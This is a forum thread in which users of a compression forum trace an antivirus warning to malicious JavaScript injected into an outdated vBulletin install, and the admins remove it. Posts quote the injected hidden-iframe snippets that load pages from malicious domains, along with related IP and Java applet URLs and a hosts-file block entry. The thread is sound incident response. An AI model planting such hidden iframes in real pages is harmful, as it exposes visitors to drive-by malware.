Forum malware injected? avast warning

[schnaader]

Every time I visit the encode.su main page or any subpage, avast is warning me about a malware URL "http://kokosina.in/t/go.php?sid=5" - this seems to be some JavaScript spreading in vBulletin forums recently, but it's quite new, so there's no further information about what it is or how to handle/remove it.

Looking at the site's source and JS, "http://encode.su/clientscript/yui/connection/connection-min.js" looks quite suspicious, but could also be just some normal minified JS.

[osmanturan]

I've confirmed that with a HTTP Proxy (Fiddler). Something tries to connect first "http://kokosina.in/t/go.php?sid=5" and then several addresses at 109.236.82.79. And there are 2 attempts to download a Java applications which is located "109.236.82.79/vukavuka.class" and "109.236.82.79/vukavuka/class.class". Microsoft Security Essentials blocked all of the attacks. I'm trying to investigate the problem currently. I'll inform when I find something.

[osmanturan]

@schnaader: You're right. Problem caused by "http://encode.su/clientscript/yui/connection/connection-min.js". It seems a typical "iframe" virus. It manipulates DOM by creating a iframe tag to connect somewhere. The odd thing is most of iframe viruses puts it's signature to end of javascript files. But, this one placed on top of a special script. I didn't bother to de-obfuscate the injected code but I can say that it patches YUI to be able to executed. Because, injected code does not invoked alone. Seems, it's especially designed for vBulletin.

[Cyan]

Malware presence confirmed on my side

[Matt Mahoney]

McAfee seems unaware of the problem. http://www.siteadvisor.com/sites/http%3A//encode.su

[Piotr Tarsa]

What that malware does? Which browsers are affected (maybe Chrome and IE9 aren't because of sandboxing)? Which OSes are affected?

[Black_Fox]

Chrome+Avast here, no malicious activity detected.

[osmanturan]

@Piotr: It's not browser specific infection. The malicious code creates iframe tag to download and run a java code. Only if only, your browser asks to run it, it can be caught. On the other hand, target URL looks like dead (well, specifically redirected URL). As a result, connection can't be established. In another words, malicious code does rely on a dead link.

[Intrinsic]

Very annoying, if this even posts. I get these warnings, the java plugin error in Opera 10.10, and the avira one pops up in 11.52. I can't even type crap in or do anything in O10.10 with this "malware" i'm having to type this in metapad and then paste it in. Check out the screenshots, and have you noticed how many guest's are online? O.o

[Shelwien]

This really looks like malware in scripts on the server
Unfortunately I don't have a server login and its a little hard for me to fix it, have to wait for encode/webmaster to notice.
The script adds

Code:

<div style="display:none;"><iframe src="http://kokosina.in/t/go.php?sid=5" width="38" height="67" border="0" frameborder="0"></iframe></div>

to the page code for some browsers. That loads and decrypts some javascripts, which in turn tries to load a java plugin and does other stuff.
Anyway, a proposed fix for now is to add

Code:

127.0.0.1 kokosina.in

to C:\WINDOWS\system32\drivers\etc\hosts


Update: redirected to a clean copy for now. Encode, webmaster, please fix this anyway.

[webmaster]

Fixed. Vulnerability scripts forum. Updated version will be tonight.

[webmaster]

Done.

[Fallon]

Reported to Avast User Forum.
http://forum.avast.com/index.php?topic=90437.0
Reason for this alert is an outdated vBulletin version, which is open to an exploit.
That's what they said.
Fixed, at least for Avast.
Well, and by the webmaster, now

[Shelwien]

I just deleted some

Code:

<div style='display:none'><iframe width='9' height='6' src='http://mavmor.in/loop.php'

from a forum template ("footer").

[Piotr Tarsa]

Looks like you've done something wrong as I see "frameborder='0' scrolling='no'>" on every (or many at least) page at the bottom.
Chromium 18 on Ubuntu.

[Shelwien]

I noticed that too, but decided to keep it like that in hope that webmaster would notice sooner
Not sure why this server is getting hacked so frequently... its not the forum itself I think -
at least the template modification didn't appear in edit history.